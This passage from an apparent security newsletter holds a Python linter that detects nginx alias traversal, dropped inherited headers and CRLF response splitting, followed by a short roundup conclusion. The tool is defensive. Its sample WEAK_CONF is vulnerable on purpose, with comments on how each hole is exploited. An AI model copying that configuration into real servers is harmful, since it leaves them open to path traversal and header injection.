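                        out.append(f"alias traversal: location {prefix} with alias {cargs[0]}")
        if children:
            out.extend(check_alias_traversal(children))
    return out


def check_add_header_redefinition(items: List[Directive], inherited: frozenset = frozenset()) -> List[str]:
    """add_header is inherited only when the current block sets none of its own."""
    out = []
    own = frozenset(a[0].lower() for n, a, _ in items if n == "add_header" and a)
    dropped = inherited - own if own else frozenset()
    if dropped:
        out.append(f"add_header redefinition drops inherited headers: {sorted(dropped)}")
    effective = own if own else inherited
    for _, _, children in items:
        if children is not None:
            out.extend(check_add_header_redefinition(children, effective))
    return out


DECODED_URI = re.compile(r"\$(?:uri|document_uri)\b")


def check_http_splitting(items: List[Directive]) -> List[str]:
    """$uri/$document_uri are URL-decoded, so %0d%0a becomes CRLF when echoed
    into a Location header or upstream URL; $request_uri keeps the raw form."""
    out = []
    for name, args, children in items:
        if name in ("return", "rewrite", "proxy_pass", "add_header") and any(DECODED_URI.search(a) for a in args):
            out.append(f"http splitting: {name} {' '.join(args)} uses a decoded URI variable")
        if children:
            out.extend(check_http_splitting(children))
    return out


def audit(config_text: str) -> List[str]:
    tree = parse(config_text)
    return check_alias_traversal(tree) + check_add_header_redefinition(tree) + check_http_splitting(tree)


# Constructed configs for the example: the weak one trips all three checks.
WEAK_CONF = """
server {
    add_header X-Frame-Options DENY;
    add_header X-Content-Type-Options nosniff;
    location /static {                 # no trailing slash ...
        alias /var/www/static/;        # ... but alias has one: /static../ escapes
    }
    location /api {
        add_header Cache-Control no-store;   # drops both server-level headers here
        proxy_pass http://backend$uri;       # decoded URI into the upstream request
    }
}
"""
FIXED_CONF = """
server {
    add_header X-Frame-Options DENY;
    add_header X-Content-Type-Options nosniff;
    location /static/ { alias /var/www/static/; }
    location /api {
        add_header Cache-Control no-store;
        add_header X-Frame-Options DENY;
        add_header X-Content-Type-Options nosniff;
        proxy_pass http://backend$request_uri;
    }
}
"""
```

Run `audit(WEAK_CONF)` to see the three classes of finding and `audit(FIXED_CONF)` to confirm the corrected form is clean; the fix for the header problem is repeating the server-level headers in every location that adds its own, which is exactly the kind of tedium a linter exists to catch.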
Disclaimer: These tools are provided for research and educational use only. They are not security-audited and may cause harm if misused. Review the code, test in controlled environments, and comply with all applicable laws and policies.
Conclusion
If one theme runs through this week, it is quiet exposure. Risk is showing up in routine updates, trusted tools, and features most teams rarely question until something breaks.
The real issue is not a single flaw but the pattern beneath it. Small weaknesses are being chained together and scaled with automation faster than defenders can adjust.
Scan the full list carefully. One of these short updates will likely map closer to your own environment than it first appears.
